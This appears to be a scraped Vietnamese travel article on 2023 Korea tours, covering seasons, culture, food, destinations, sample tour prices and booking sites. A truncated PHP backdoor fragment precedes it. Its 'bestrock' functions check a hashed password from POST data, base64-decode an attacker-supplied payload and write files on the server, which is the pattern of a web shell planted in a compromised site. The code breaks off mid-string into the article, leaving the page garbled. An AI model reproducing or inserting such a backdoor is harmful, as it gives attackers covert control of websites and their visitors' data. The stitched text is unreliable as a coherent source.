function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Trải nghiệm tour đi Hàn Quốc 2023 SIÊU CHẤT - Đi Để Đến

Trải nghiệm tour đi Hàn Quốc 2023 SIÊU CHẤT

30/09/2022 Đi Để Đến - Group

Tour đi Hàn Quốc 2023 nào được yêu thích nhất hiện nay mà bạn đang tìm kiếm? Nên đi Hàn Quốc vào thời gian nào? Ăn gì? Đi những đâu? Vậy thì đừng bỏ qua bài viết này để có thể chọn ra tour phù hợp với sở thích và ngân sách của mình. 

NÊN ĐI HÀN QUỐC VÀO THỜI GIAN NÀO?

Hàn Quốc là đất nước với khí hậu ôn đới và vì vậy thời tiết giữa bốn mùa sẽ có khác biệt lớn, đặc biệt là giữa mùa đông và mùa hè.

1. Tour đi du lịch Hàn Quốc mùa xuân

Mùa xuân được coi là thời điểm tuyệt vời nhất để khám phá xứ sở kim chi. Bởi nhiệt độ trung bình dao động trong khoảng dưới 18 độ C, vô cùng thoải mái và dễ chịu. Đây cũng là thời điểm mà những loài hoa đẹp nhất ở Hàn Quốc nở rộ, đặc biệt là hoa anh đào. Đến với tour đi Hàn Quốc 2023 mùa xuân, du khách còn được tham gia các lễ hội truyền thống đặc sắc.

Tour đi Hàn Quốc 2022 - Hoa anh đào nở rộ

Cảnh hoa anh đào nở rộ trên đường phố tại Hàn Quốc. Nguồn ảnh: Sưu tầm

2. Tour đi du lịch Hàn Quốc mùa hè

Du lịch Hàn Quốc mùa hè cũng là một lựa chọn thú vị khi du khách có cơ hội được khám phá những hòn đảo nổi tiếng như Nami, Jeju. Bởi khí hậu vô cùng ủng hộ cho những hoạt động trải nghiệm dưới nước. Thêm nữa, bạn có thể đến bờ biển đông với khung cảnh tuyệt đẹp, thu hút rất nhiều du khách vào mùa hè oi bức.

Tour đi Hàn Quốc 2022 - Đảo Nami

Vẻ đẹp mùa hè tại thiên đường du lịch đảo Nami.  Nguồn ảnh: Sưu tầm

3. Tour đi du lịch Hàn Quốc mùa thu

Đi du lịch Hàn Quốc vào mùa thu là sự lựa chọn lý tưởng. Đây là thời điểm mà bầu không khí dễ chịu và se lạnh, với cảnh quan thiên nhiên được nhuốm sắc cam, vàng và đỏ vô cùng rực rỡ. Đó cũng là lý do mà tour đi Hàn Quốc 2023 mùa thu trở thành tour du lịch hot nhất bên cạnh mùa xuân.

Tour đi Hàn Quốc 2022 - Mùa thu Đảo Nami

Mùa thu tại Đảo Nami ngập tràn sắc vàng. Nguồn ảnh: Sưu tầm

4. Tour đi du lịch Hàn Quốc mùa đông

Đến Hàn Quốc vào mùa đông, du khách sẽ được trải nghiệm cảm giác lạnh buốt khi nhiệt độ có thể giảm mạnh xuống âm độ C. Tuy nhiên, mùa đông Hàn Quốc là thời điểm thích hợp cho những hoạt động thú vị như câu cá trên băng, tham quan đảo Nami và thưởng thức những món ăn nóng hổi đúng với đặc trưng của xứ lạnh.

Tour đi Hàn Quốc 2022 - Tuyết phủ trắng đường

Tuyết phủ dày đặc trên đường phố Hàn Quốc. Nguồn ảnh: Sưu tầm

>>>Xem thêm: Đi du lịch Hàn Quốc nên đi mùa nào đẹp nhất

ĐẶC TRƯNG VĂN HÓA ĐỘC ĐÁO CỦA HÀN QUỐC

1. Trang phục truyền thống

Nổi tiếng với những bộ phim cổ trang đình đám và khung cảnh cung điện cổ xưa, Hanbok trở thành trang phục truyền thống tương đối quen thuộc với tất cả du khách. Tour đi Hàn Quốc 2023 sẽ đưa du khách trải nghiệm những hoạt động vô cùng riêng biệt điển hình như mặc Hanbok chụp ảnh kỷ niệm ở cung điện.

Tour di Han Quoc 2022 - hanbok

Check-in trong trang phục truyền thống Hanbok. Nguồn: Sưu tầm

2. Âm nhạc

Âm nhạc Hàn Quốc có tầm ảnh hưởng sâu rộng và góp phần phát triển kinh tế cho Hàn Quốc. Những bài hát của xứ Hàn chiếm vị trí cao trên các bảng xếp hạng quốc tế. Không chỉ những bài hát nhạc trẻ sôi động, mà những bài hát mang âm hưởng truyền thống của Hàn Quốc cũng thu hút mọi du khách đến khám phá đất nước này.

3. Điểm nổi bật trong đời sống văn hóa của Hàn Quốc

Mọi du khách đi tour Hàn Quốc 2 đều cần biết những tập quán cơ bản. Hàn Quốc rất coi trọng văn hóa chào hỏi. Người Hàn sẽ thường cúi đầu kết hợp với những câu chào quen thuộc. Đặc biệt là cần cúi đầu đáp lễ khi người khác cúi đầu chào mình để tỏ phép lịch sự.

Uống rượu cũng là nét văn hóa đặc biệt của người Hàn. Một trong những loại rượu nổi tiếng nhất ở Hàn là rượu Soju. Soju là loại rượu được yêu thích nhất và được quảng bá trong hầu hết các phim Hàn. Nếu lựa chọn trải nghiệm tour đi Hàn Quốc 2023, bạn nhất định phải nếm thử loại rượu này.

Tour đi Hàn Quốc 2022 - rượu soju

Thưởng thức rượu Soju tại Hàn Quốc. Nguồn: Sưu tầm

>>>Xem thêm: Du lịch Hàn Quốc 2023 – Top 5+ kinh nghiệm không thể bỏ qua

NHỮNG ĐIỀU THÚ VỊ TRONG TOUR ĐI HÀN QUỐC 2023 KHÔNG THỂ BỎ LỠ

1. Gợi ý món ăn nhất định phải thử

Thịt nướng BBQ

Các món thịt nướng Hàn Quốc được xem là món ăn hấp dẫn và nhất định phải thử. Vì thịt nướng là món ăn bắt nguồn từ xứ Hàn. Món ăn này có mùi vị riêng biệt được tẩm ướp theo loại gia vị đặc trưng. Thịt nướng BBQ thường được ăn kèm với kim chi và uống kèm với rượu Soju.

Một số địa điểm gợi ý trong tour đi Hàn Quốc 2023 như: Quán thịt nướng Sutbul Mapo Galbi, gần trạm Shincheon, Quán thịt nướng Woosung Galbi ở chợ Yaksu, Seochomyeonok ở Seocho-dong và Gangnammyeonok ở Shinsa-dong.

Tour đi Hàn Quốc 2022- thịt nướng BBQ

Thịt nướng BBQ ướp gia vị chuẩn Hàn. Nguồn: Sưu tầm

Kim chi

Kim chi là món ăn biểu tượng cho ẩm thực xứ Hàn. Kim chi được làm từ bắp cải, củ cải, cà rốt, hành tây, hành lá, tỏi và muối và được để lên men. Đây là món ăn được ăn riêng hoặc trở thành nguyên liệu cho các món ăn khác như cơm chiên kim chi, canh kim chi, các món hầm.

Kim chi với vị cay đặc trưng của xứ hàn được ăn hầu hết với các món ăn. Và vì thế khi đặt chân đến bất kì quán ăn nào tại Hàn Quốc, du khách đều có thể dễ dàng thưởng thức.

tour di Han Quoc 2022 - kim chi

Món ăn được yêu thích tại Hàn Quốc. Nguồn: Sưu tầm

Mì tương đen

Đây cũng là món ăn mà hiện tại các quán đồ Hàn tại Việt Nam đều có thể chế biến. Tuy nhiên nếu thử tại Hàn Quốc, trong một không gian đậm chất văn hóa thì mì tương đen sẽ trở nên đặc biệt hơn. Bởi trong văn hóa xứ Hàn, đây là món ăn được chuẩn bị cho những ngày kỉ niệm hay ngày lễ.

Một số địa điểm gợi ý trong tour đi Hàn Quốc 2023 thể tham khảo: Myeongdong Kyoja: 29 Myeongdong 10-gil, Myeongdong 2(i)-ga, Myeongdong Kyoja: 8 Myeongdong 10-gil, Myeongdong 2(i)-ga, Jung-gu, Seoul

Tour đi Hàn Quốc 2022 - Mì tương đen

Mì tương đen Hàn Quốc tại một nhà hàng nổi tiếng. Nguồn: Sưu tầm

Bạch tuộc xào cay

Tín đồ hải sản không thể không nếm thử món ăn hấp dẫn này. Đây là món ăn giá thành không quá cao, tương đối bình dân vì vậy ai cũng có thể thưởng thức. Món ăn được chế biến từ những loại bạch tuộc nhỏ cùng với loại ớt bột và tương ớt của Hàn. Do đó ăn rất giòn và thơm ngon.

Một số địa điểm ăn bạch tuộc xào cay nên thử như: Big Guy’s Seafood,Wonjo Halmeoni Nakji Center: 265, Cheongjin-dong, Jongno-gu.

Tour đi Hàn Quốc 2022 - Bạch tuộc xào cay

Bạch tuộc xào cay là món ăn không thể bỏ lỡ với tín đồ hải sản. Nguồn: Sưu tầm

Súp xương bò hầm

Bên cạnh những món ăn tương đối quen thuộc ở Hàn Quốc, súp xương bò hầm là món ăn đáng để thử khi đi du lịch tại đây. Món ăn này được làm từ xương bò mềm được hầm nhừ. Và vì vậy, nước dùng sẽ có vị thơm và ngọt rất phù hợp khi ăn vào mùa đông.

Một số địa điểm để thưởng thức món ăn trong tour đi Hàn Quốc 2023: 56 Myeongdong-gil, Myeongdong 2(i)-ga, Jung-gu, 24 Gangnam-daero 101an-gil, Jamwon-dong, Seocho-gu

Tour đi Hàn Quốc 2022 - Súp xương bò hầm

Súp xương bò hầm nóng hổi thường được ăn kèm với cơm trắng. Nguồn: Sưu tầm

2. Địa điểm du lịch Hàn Quốc được yêu thích nhất

Thủ đô Seoul

Đây là một thành phố năng động, trẻ trung và cũng là trung tâm du lịch phát triển mạnh mẽ tại quốc gia này. Tại Seoul, du khách có thể được vui chơi, khám phá, nghỉ dưỡng và mua sắm tại những trung tâm mua sắm sang trọng. Thêm nữa, du khách còn được trải nghiệm không gian văn hóa truyền thống như tham quan một số cảnh đẹp tại các lăng tẩm, chùa chiền.

Tour đi Hàn Quốc 2022 - check in tại thủ đô Seoul

Check-in tại làng Bukchon Hanok. Nguồn: Sưu tầm

Busan

Tour du lịch Hàn Quốc đến Busan cũng là một chuyến đi được ưa chuộng. Bởi tại đây, du khách có thể tham quan những bãi biển xinh đẹp kết hợp với việc đi khám phá những cảnh đẹp thiên nhiên khác. Busan là một thành phố mang nét hiện đại đan xen truyền thống. Do đó du khách có thể mua sắm thỏa thích tại các trung tâm thương mại hay tham quan các di tích nổi tiếng lâu đời.

Tour đi Hàn Quốc 2022 - Busan

Thành phố Busan hiện đại và sầm uất

>>>Xem thêm: Khám phá Tour Hàn Quốc 2023 – Những điều phải biết

MỘT SỐ TOUR DU LỊCH HÀN QUỐC 2023 ĐƯỢC YÊU THÍCH

1. Tour du lịch Seoul – Nami – Jeju – Everland Hàn Quốc

Đây là tour du lịch nhận được nhiều sự quan tâm với giá cả dao động trong khoảng 21 triệu trong 6 ngày 5 đêm. Du khách sẽ được ghé thăm thủ đô Seoul, đảo Nami, đảo Jeju và khu vui chơi giải trí nổi tiếng Everland.

Tour du lịch Hàn Quốc này sẽ đưa bạn đến rất nhiều nơi bao gồm cả việc khám phá các cung điện, tháp truyền hình Namsan cùng những hòn đảo xinh đẹp Nami và Jeju. Mỗi địa điểm sẽ ghé thăm trong vòng 1 ngày. Dù vậy, du khách cần có một sức khỏe tốt để di chuyển đến các địa điểm, vui chơi ngắm cảnh mà không mệt mỏi.

Tour đi Hàn Quốc 2022 - Trung tâm giải trí Everland

Khám phá trung tâm giải trí Everland. Nguồn: Sưu tầm

>>>Xem thêm: Tour du lịch Hàn Quốc 5 ngày 4 đêm dịp Tết Nguyên Đán

2. Tour đi Busan – Gyeongju – Seoul – Nami – Everland – công viên tuyết One Mount

Giá tour tham khảo dao động trong khoảng 20 triệu VNĐ, thời gian là 5 ngày 4 đêm. Tour đi Busan được ưa chuộng vào dịp hè bởi các hoạt động du lịch trải nghiệm dưới nước tại các đảo. Tuy nhiên, du khách có thể thử sức với các trò chơi trượt tuyết như trong mùa đông khi đặt chân đến công viên tuyết One Mount

Tour đi Busan sẽ dẫn bạn đến với thành phố biển Busan, đảo Nami, ghé thăm thủ đô Seoul, công viên tuyết One Mount. Vì khám phá khá nhiều nơi do đó du khách chỉ được tham quan mỗi địa điểm trong vòng từ nửa ngày đến 1 ngày.

Tour đi Hàn Quốc 2022 - công viên tuyết Onemount

Công viên tuyết nổi tiếng tại xứ sở kim chi. Nguồn: Sưu tầm

GỢI Ý ĐỊA CHỈ ĐẶT TOUR GIÁ RẺ

1. Vietnam Booking

Vietnam Booking là một trong những trang web đặt tour uy tín ở Việt Nam khi tổ chức các tour du lịch đa dạng khắp năm châu. Trong đó, tour đi Hàn Quốc 2023 cũng được coi là tour du lịch nhận được nhiều sự quan tâm bởi giá tour tại Vietnam Booking hợp lý. Hơn nữa, du khách được ghé thăm một số địa điểm du lịch nổi tiếng như Seoul hay Nami. Sắp tới đây là tận hưởng mùa thu Seoul 2023 với tour trọn gói và giá cả phải chăng.

2. Traveloka

Đây là một website nổi tiếng, hỗ trợ đặt phòng, đặt tour du lịch của Indonesia và vô cùng uy tín với những khuyến mãi hấp dẫn và giá rẻ. Tour đi Hàn Quốc 2023 của Traveloka bao gồm những tour đi Seoul, Nami hay công viên Everland. Bên cạnh đó, Traveloka còn cung cấp một số lịch trình tour khác như đi Busan cho du khách thỏa sức lựa chọn.

3. Vietravel

Vietravel hiện tại đang sở hữu nhiều tour du lịch đa dạng đến các địa điểm khác nhau. Các tour đi Hàn Quốc 2023 vô cùng phong phú. Thêm nữa, được tổ chức vào nhiều thời điểm trong năm phù hợp với sở thích du lịch của mỗi du khách. Bên cạnh đó, Vietravel cũng có nhiều chương trình ưu đãi, đảm bảo mức giá tốt cho những du khách muốn đi du lịch nước ngoài giá rẻ.

>>>Xem thêm: Trải nghiệm mùa đông Hàn Quốc cùng vé máy bay giá rẻ Vietnam Airlines

NHỮNG LƯU Ý ĐẶC BIỆT KHI ĐI TOUR DU LỊCH HÀN QUỐC 2023

1. Mua sắm

Hàn Quốc là thiên đường của mua sắm do vậy khi đến đây, các du khách cần lưu ý khi mua sắm những mặt hàng tại chợ và trong trung tâm thương mại. Đối với những mặt hàng ở chợ, bạn nên quan sát thái độ của người bán hàng và trả giá phù hợp. Với những mặt hàng ở trung tâm thương mại, sẽ có chương trình siêu sale vào tầm tháng 11 và tháng 12. Do vậy, đây là thời điểm săn sale thích hợp.

Các mặt hàng như đồ ngọt, đồ ăn vặt ở Hàn Quốc được nhiều du khách mua mang về làm quà tặng với số lượng lớn. Những mặt hàng này có thể được bán ở cả chợ và cửa hàng tạp hóa với mức giá vừa phải.

Đặc biệt không thể quên việc mua nhân sâm mang về. Bởi nhân sâm là một trong những quà tặng giàu dinh dưỡng và chất lượng mà giá cả không quá đắt đỏ. Để tìm mua nhân sâm với chất lượng tốt, du khách có thể tìm đến chợ sâm ở Busan hay trung tâm nhân sân.

Tour đi Hàn Quốc 2022 - Trung tâm mua sắm

Trung tâm mua sắm sang trọng tại Hàn Quốc. Nguồn: Sưu tầm

2. Điểm đáng lưu ý về văn hóa

Ở Hàn Quốc, việc vứt rác bừa bãi nơi công cộng sẽ bị phạt tiền. Do đó, cần vứt rác đúng chỗ để tránh những rắc rối không đáng có. Hơn nữa, người dân Hàn Quốc đi bộ rất nhiều nên việc xô đẩy hay chen chân trong những giờ cao điểm là điều bình thường.

Đặc biệt, Hàn Quốc là đất nước coi trọng văn hóa chào hỏi, giao tiếp do đó việc chào hỏi đúng cách là điều rất quan trọng. Nhất là với những người lớn tuổi, cần có thái độ ứng xử phù hợp, tránh bị đánh giá là thô lỗ.

3. Các phương tiện di chuyển tại Hàn Quốc

Di chuyển bằng tàu ngầm hay xe bus là những lựa chọn hợp lý khi chọn tour đi Hàn Quốc 2023. Xe bus là phương tiện quen thuộc với đa phần người dân Việt Nam. Tuy nhiên tàu điện ngầm lại là phương tiện khá mới so với những người lần đầu đến Hàn Quốc. Do vậy, du khách nên tải trước bản đồ tàu điện ngầm trên điện thoại để tra cứu tuyến đường một cách nhanh chóng.

tour di han quoc 2022 xe buyt 1

Xe buýt là phương tiện công cộng được người Hàn ưa chuộng. Nguồn: Sưu tầm.

>>>Xem thêm: Tour du lịch chiêm ngưỡng mùa thu Hàn Quốc 4 ngày 3 đêm cực rẻ

Với những thông tin hữu ích về Tour đi Hàn Quốc 2023 đã chia sẻ ở trên, hy vọng bạn có thể lựa chọn được tour đi phù hợp với sở thích và ngân sách của mình. Nếu còn thắc mắc hoặc muốn có thêm thông tin chi tiết bạn có thể liên hệ trực tiếp tổng đài 1900 3398 để được tư vấn và hỗ trợ bạn nhé!

ĐĂNG KÍ ĐẶT TOUR DU LỊCH HÀN QUỐC
  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]